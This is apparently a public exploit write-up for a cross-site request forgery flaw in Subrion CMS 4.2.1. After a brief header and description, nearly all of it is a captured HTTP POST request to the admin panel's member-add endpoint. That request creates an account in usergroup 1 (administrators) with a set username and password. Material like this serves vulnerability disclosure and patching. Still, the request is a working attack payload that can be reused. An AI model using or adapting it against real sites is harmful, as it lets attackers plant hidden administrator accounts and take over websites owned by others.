# Exploit Title: Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin)
# Date: 2022-02-09
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://subrion.org
# Software Link: https://subrion.org/download
# Version: 4.2.1
# Tested on: Windows 10

# [ About - Subrion CMS ]: 
#Subrion is a PHP/MySQL based CMS & framework,
#that allows you to build websites for any purpose,
#Yes, from blog to corporate mega portal.

# [ Description ]:
# CSRF vulnerability was discovered in 4.2.1 version of Subrion CMS,
# With this vulnerability, authorized users can be added to the system.

# [ Sample CSRF Request ]:

POST /subrion/panel/members/add/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------386122140640094420852486902
Content-Length: 2522
Origin: http://localhost
Connection: close
Referer: http://localhost/subrion/panel/members/add/
Cookie: loader=loaded; INTELLI_ffd8ae8438=ftph4lgam8hugh8j0mgv8j4q2l
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="__st"

YNXrr7MjSY0Qi0JYISJ7DRuC9Gd1zxPYwjHcFKVh
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="username"

Aryan
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="fullname"

AryanChehreghani
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="email"

aryanchehreghani@yahoo.com
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="_password"

Test1234!
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="_password2"

Test1234!
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="usergroup_id"

1
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="website"


-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="phone"


-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="biography"


-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="facebook"


-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="twitter"


-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="gplus"


-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="linkedin"


-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="email_language"

en
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="sponsored"

0
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="featured"

0
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="featured_end"

2022-03-09 12:03
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="status"

active
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="save"

1
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="goto"

list
-----------------------------386122140640094420852486902--